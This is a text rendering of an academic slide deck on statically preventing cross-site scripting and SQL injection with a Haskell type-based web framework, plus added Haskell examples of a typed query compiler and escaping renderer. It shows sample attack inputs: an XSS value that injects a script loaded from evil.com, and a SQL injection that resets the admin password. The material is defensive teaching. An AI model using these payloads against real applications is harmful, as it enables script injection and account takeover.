Static Enforcement of Web Application Integrity William Robertson - - PowerPoint PPT Presentation



SLIDE 1

Static Enforcement of Web Application Integrity

William Robertson and Giovanni Vigna {wkr,vigna}@cs.ucsb.edu

Computer Security Group UC Santa Barbara

13 August 2009

(UCSB SecLab) Static Web App Integrity Enforcement 13 August 2009 1 / 28

SLIDE 2

Web applications are...

◮ easy to develop
◮ easy to deploy
◮ easy to update
◮ accessible from everywhere

SLIDE 6

...and broken

FAA Review of Web Applications Security and Intrusion Detection in Air Traffic Control Systems
Report Number: FI-2009-049
Date Issued: May 4, 2009

SLIDE 8

A pervasive problem

SLIDE 9

Cross-site scripting

Template with a substituted variable $var:

<input type="hidden" name="m" value="$var"/>

With $var = x:

<input type="hidden" name="m" value="x"/>

With $var chosen so that it closes the attribute and the tag, the document gains a script element:

<input type="hidden" name="m" value="x"/>
<script src="http://evil.com/x.js"> </script>
<span id="x"/>

SLIDE 12

SQL injection

Query template with a substituted variable $var:

UPDATE users SET passwd='$var' WHERE login='user'

With $var = l33r0y:

UPDATE users SET passwd='l33r0y' WHERE login='user'

With $var chosen so that it closes the string literal and comments out the original WHERE clause:

UPDATE users SET passwd='l33r0y' WHERE login='admin'--' WHERE login='user'

SLIDE 15

Existing solutions

◮ Web application firewalls
◮ Automated static, dynamic analyses
◮ Penetration testing and code auditing

SLIDE 16

Why are web apps vulnerable?

◮ Web documents and database queries treated as unstructured character sequences
◮ No knowledge of structure and content at the framework level
◮ Developers responsible for manually sanitizing content
◮ Failure to preserve integrity of document and database query structure

SLIDE 17

A language-based solution

◮ Explicitly denote structure and content within language using the type system
◮ Language is responsible for preserving application integrity
◮ Lift burden as much as possible from the developer
◮ No testing, separate analyses, policy specifications
◮ Web application compiles → application is safe

SLIDE 18

Framework overview

◮ Haskell-based application framework prototype
◮ Application implemented as set of functions executing within the App monad stack
◮ HTTP requests routed to functions
◮ Functions perform computations and return documents

SLIDE 19

Documents

[Figure: example document tree. Node names shown: Document, DocHead, DocBody, TitleNode, LinkNode, DivNode, AnchorNode, TextNode, DivNode, TextNode]

SLIDE 20

Document nodes

data Node = TextNode { nodeText :: String }
          | AnchorNode { anchorAttrs :: NodeAttrs,
                         anchorHref :: Maybe Url,
                         ...
                         anchorNodes :: [Node] }
          | DivNode { divAttrs :: NodeAttrs,
                      divNodes :: [Node] }
          ...

SLIDE 24

Enforcing document integrity

◮ Type system restricts applications to constructing Document trees
◮ f :: HttpRequest -> App Document
◮ Framework is responsible for rendering tree into text

SLIDE 25

Document rendering

[Figure: the document tree of slide 19 (Document, DocHead, DocBody, TitleNode, LinkNode, DivNode, AnchorNode, TextNode, DivNode, TextNode) is rendered by the web application framework into the text below]

<html>
  <head>
    <title>...</title>
  </head>
  <body>
    <div>
      <a href="...">...</a>
    </div>
    ...
    <div>
    </div>
  </body>
</html>

SLIDE 26

Node sanitization

class Render a where
  render :: a -> String

◮ Nodes implement Render typeclass
◮ render sanitizes data given context

SLIDE 27

Database queries

UPDATE users SET passwd=? WHERE login=?

◮ Mechanism already exists to fix query structure – prepared statements
◮ App monad controls access to database functions

SLIDE 29

Enforcing static query integrity

[Figure: the App monad stack, showing the layers IO, AppIO, AppState, AppConfig and Application]

SLIDE 30

Not all queries are static

SELECT * FROM users WHERE login IN ('admin')
SELECT * FROM users WHERE login IN ('admin', 'devel')
SELECT * FROM users WHERE login IN ('admin', 'devel', 'test')

SLIDE 33

Enforcing dynamic query integrity

[Figure: the query of slide 30 as a typed tree, with nodes SELECT ["*"] ["users"], IN "login", and SET "admin" "test" "devel"]
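The typed-query idea of the Database queries and Enforcing dynamic query integrity slides, worked through as an added example written for this page (it is not the paper's framework code): a Query value fixes the statement's structure, and a compile function, an assumed name, emits prepared-statement text with ? placeholders and a separate parameter list. The constructors Select, Update, Eq, In and And, the ident check and the empty-IN rule are all assumptions of this example; the injected password is the one from the SQL injection slide and the growing login list is the one from Not all queries are static.

```haskell
{- Added example, not the paper's code: a typed query tree compiled to a
   prepared statement.  Constructors and helper names are assumptions. -}
module Main where

import Data.Char (isAlphaNum, isDigit)
import Data.List (intercalate)

data Value = VStr String | VInt Int deriving (Eq, Show)

data Cond
  = Eq String Value        -- column = ?
  | In String [Value]      -- column IN (?, ?, ...)   the dynamic case
  | And Cond Cond

data Query
  = Select [String] String Cond            -- columns, table, condition
  | Update String [(String, Value)] Cond   -- table, assignments, condition

-- Table and column names come from the programmer, never from a request,
-- but the framework still refuses anything that is not a plain identifier.
ident :: String -> String
ident s
  | not (null s) && not (isDigit (head s)) && all (\c -> isAlphaNum c || c == '_') s = s
  | otherwise = error ("not an identifier: " ++ s)

-- One '?' per value; the values themselves never enter the statement text.
placeholders :: [a] -> String
placeholders xs = intercalate ", " (map (const "?") xs)

compileCond :: Cond -> (String, [Value])
compileCond (Eq col v)  = (ident col ++ " = ?", [v])
compileCond (In _   []) = ("0 = 1", [])   -- IN () is not valid SQL; an empty set matches nothing
compileCond (In col vs) = (ident col ++ " IN (" ++ placeholders vs ++ ")", vs)
compileCond (And a b)   =
  let (sa, pa) = compileCond a
      (sb, pb) = compileCond b
  in ("(" ++ sa ++ ") AND (" ++ sb ++ ")", pa ++ pb)

-- The constructors fix the structure; every Value becomes a bound
-- parameter, so request data can never extend or comment out the WHERE.
compile :: Query -> (String, [Value])
compile (Select cols tbl c) =
  ("SELECT " ++ intercalate ", " (map selCol cols) ++ " FROM " ++ ident tbl ++ " WHERE " ++ sc, pc)
  where
    (sc, pc)   = compileCond c
    selCol "*" = "*"
    selCol x   = ident x
compile (Update tbl sets c) =
  ("UPDATE " ++ ident tbl ++ " SET " ++ intercalate ", " [ident k ++ " = ?" | (k, _) <- sets]
     ++ " WHERE " ++ sc, map snd sets ++ pc)
  where (sc, pc) = compileCond c

-- The injected password from the SQL injection slide, as constructed input.
injectedPasswd :: String
injectedPasswd = "l33r0y' WHERE login='admin'--"

main :: IO ()
main = do
  -- The static UPDATE: the payload travels as the first parameter.
  print (compile (Update "users" [("passwd", VStr injectedPasswd)] (Eq "login" (VStr "user"))))
  -- The dynamic IN list: one placeholder per login, however many there are.
  print (compile (Select ["*"] "users" (In "login" (map VStr ["admin", "devel", "test"]))))
```

Running it with runghc prints, for each query, the statement text and the parameter list side by side; the UPDATE text is identical whether the password is benign or the injected one, which is exactly the property the prepared statement on the Database queries slide relies on. The empty-IN case is the edge a hand-built IN list usually gets wrong, so the compiler handles it explicitly rather than emitting invalid SQL.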

SLIDE 34

Sanitization evaluation

◮ Performed control flow analysis of framework to evaluate coverage of sanitization functions
◮ Evaluated correctness of individual sanitization functions

SLIDE 35

Sanitization function coverage

SLIDE 36

Sanitization function correctness

◮ Test-driven approach to check correctness
◮ Number of invariants manually specified
◮ 1,000,000 random test cases generated using QuickCheck
◮ Test cases for malicious examples

SLIDE 37

Sanitization function invariants

propAttrValueSafe :: AttrValue -> Bool
propAttrValueSafe input =
    (not $ elem '<' output) &&
    (not $ elem '>' output) &&
    (not $ elem '&' $ stripEntities output) &&
    (not $ elem '"' output)
  where
    output = render input
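The document tree of the Document nodes, Enforcing document integrity and Node sanitization slides and the propAttrValueSafe invariant on this slide, worked through together as an added example written for this page (it is not the paper's framework code): a small Node type whose only route to text is render, which escapes according to the context each value occupies, plus the invariant checked over generated attribute values. The InputNode constructor, the Url and AttrValue wrappers, escapeHtml, stripEntities, the href scheme check and the hand-rolled generator standing in for QuickCheck are all assumptions of this example; the hidden-input value it feeds in is the one from the Cross-site scripting slide.

```haskell
{- Added example, not the paper's framework code: a typed Node tree whose
   render escapes per context, and the slide-37 invariant property-tested.
   Every constructor and helper below is an assumption of this example. -}
module Main where

import Data.Char (isAlphaNum)
import Data.List (isPrefixOf)

newtype Url = Url String                -- assumed URL wrapper
type NodeAttrs = [(String, String)]     -- assumed attribute representation
newtype AttrValue = AttrValue String    -- the attribute-value context of slide 37

data Node
  = TextNode   { nodeText :: String }
  | AnchorNode { anchorAttrs :: NodeAttrs, anchorHref :: Maybe Url, anchorNodes :: [Node] }
  | DivNode    { divAttrs :: NodeAttrs, divNodes :: [Node] }
  | InputNode  { inputAttrs :: NodeAttrs }   -- assumed; models the hidden input of slide 9

class Render a where
  render :: a -> String

-- Text and attribute contexts: every character that can alter HTML
-- structure becomes a character reference.
escapeHtml :: String -> String
escapeHtml = concatMap esc
  where
    esc '<'  = "&lt;"
    esc '>'  = "&gt;"
    esc '&'  = "&amp;"
    esc '"'  = "&quot;"
    esc '\'' = "&#39;"
    esc c    = [c]

instance Render AttrValue where
  render (AttrValue v) = escapeHtml v

-- The renderer supplies the quotes, so an injected quote cannot end the value.
renderAttrs :: NodeAttrs -> String
renderAttrs = concatMap one
  where
    one (k, v) | not (null k) && all isAlphaNum k = " " ++ k ++ "=\"" ++ render (AttrValue v) ++ "\""
               | otherwise = ""   -- attribute names are code, not data; drop anything odd

-- URL context: only relative or http(s) targets are emitted at all.
renderHref :: Maybe Url -> String
renderHref (Just (Url u))
  | any (`isPrefixOf` u) ["http://", "https://", "/"] = " href=\"" ++ escapeHtml u ++ "\""
renderHref _ = ""

instance Render Node where
  render (TextNode t)            = escapeHtml t
  render (AnchorNode attrs h ns) = "<a" ++ renderHref h ++ renderAttrs attrs ++ ">" ++ concatMap render ns ++ "</a>"
  render (DivNode attrs ns)      = "<div" ++ renderAttrs attrs ++ ">" ++ concatMap render ns ++ "</div>"
  render (InputNode attrs)       = "<input" ++ renderAttrs attrs ++ "/>"

-- Remove well-formed character references so that any '&' left over is a
-- bare ampersand the sanitizer missed.
stripEntities :: String -> String
stripEntities ('&' : rest) =
  case break (== ';') rest of
    (name, ';' : rest') | not (null name) && all (\c -> isAlphaNum c || c == '#') name -> stripEntities rest'
    _ -> '&' : stripEntities rest
stripEntities (c : rest) = c : stripEntities rest
stripEntities []         = []

-- The invariant from slide 37.
propAttrValueSafe :: AttrValue -> Bool
propAttrValueSafe input =
  (not $ elem '<' output) &&
  (not $ elem '>' output) &&
  (not $ elem '&' $ stripEntities output) &&
  (not $ elem '"' output)
  where output = render input

-- A small deterministic generator stands in for QuickCheck; the alphabet
-- is biased toward the characters that matter in HTML.
nextSeed :: Int -> Int
nextSeed s = (s * 1103515245 + 12345) `mod` 2147483648

genAttrValue :: Int -> (AttrValue, Int)
genAttrValue seed = go (seed `mod` 20) (nextSeed seed) []
  where
    alphabet = "ab<>&\"'/= ;#x"
    go 0 s acc = (AttrValue acc, s)
    go n s acc = go (n - 1) (nextSeed s) (alphabet !! (s `mod` length alphabet) : acc)

-- True when the invariant holds for n generated attribute values.
checkInvariant :: Int -> Int -> Bool
checkInvariant 0 _    = True
checkInvariant n seed = propAttrValueSafe v && checkInvariant (n - 1) seed'
  where (v, seed') = genAttrValue seed

-- The injected hidden-input value from the Cross-site scripting slide, as constructed input.
payload :: String
payload = "x\"/> <script src=\"http://evil.com/x.js\"> </script> <span id=\"x"

main :: IO ()
main = do
  putStrLn (render (InputNode [("type", "hidden"), ("name", "m"), ("value", payload)]))
  putStrLn (render (DivNode [] [AnchorNode [] (Just (Url "/home")) [TextNode "<b>home</b>"]]))
  print (checkInvariant 100000 42)
```

Run with runghc: the first line shows the hidden input with the payload still inside a single quoted value rather than as a new script element, the second shows the text node's angle brackets rendered as entities, and the last line reports whether the invariant held for all generated values. Dropping one case from escapeHtml (say, the double quote) makes checkInvariant fail as soon as the generator emits that character, which is the kind of defect the paper's QuickCheck runs were designed to catch.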

SLIDE 38

Performance

◮ Implemented web application using three frameworks
  ◮ Haskell
  ◮ Pylons
  ◮ Tomcat
◮ Evaluated throughput and latency

SLIDE 39

Latency

SLIDE 40

Throughput

SLIDE 41

Conclusions

◮ XSS and SQL injection stem from failure to enforce integrity of documents and database queries
◮ Type system allows framework to automatically prevent introduction of server-side vulnerabilities
◮ Prototype framework is effective at preventing exploitation
◮ Reasonable latency and throughput performance
